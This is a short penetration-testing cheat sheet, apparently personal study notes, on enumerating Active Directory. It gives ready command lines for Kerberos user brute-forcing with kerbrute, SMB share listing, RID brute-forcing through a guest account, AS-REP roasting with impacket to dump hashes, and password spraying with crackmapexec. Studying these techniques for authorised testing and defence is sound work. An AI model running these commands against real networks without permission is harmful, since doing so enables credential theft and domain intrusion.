Active Directory

Enumeration

Recon first using any port scanning tool.

Kerberos & Smb

Try to gather as much info possible. I usually start by brute forcing some users. But if we already know some creds, get to listing

#no user, no creds
kerbrute userenum --dc DC.machine-A.local -d machine-A.local userlist.txt

#with creds
smbclient -L \\\\<ip> -U user -p pass #list
smbclient \\\\10.10.188.12\\Share -U user -p pass #specific share

smbmap -u user -p pass -R <share> -H <IP> -P <port> #works better for enum sometimes

smbclient \\\\<ip>\\JuicyShare -U user@domain.local #interactive

Then, I check if any account is active with smbmap, smbclient, or crackmapexec. Using crackmapexec we can also bruteforce the RIDs.

#if guest account is available, no pass, rid bruteforcing
crackmapexec smb DC.machine-A.local -u 'guest' -p '' --rid-brute

You can then put all the (SidTypeUser) into a list and try to exploit Kerberos pre-authentication mechanisms and hopefully dump some hashes.

python impacket/GetNPUsers.py <domain-name>/ -usersfile user.txt -no-pass -dc-ip <dc-ip>
python3 impacket/GetNPUsers.py "domain.local/User:Pass"

If any other user come out, that is just great, you can now maybe bruteforce a login if there is lockout or any other anti-bruteforce mechanism. You can also do this with crackmapexec

crackmapexec smb DC.machine-A.local -u 'DnsAdmins' -p passwordlist

PreviousInternal ReconNextPost Exploitation

Last updated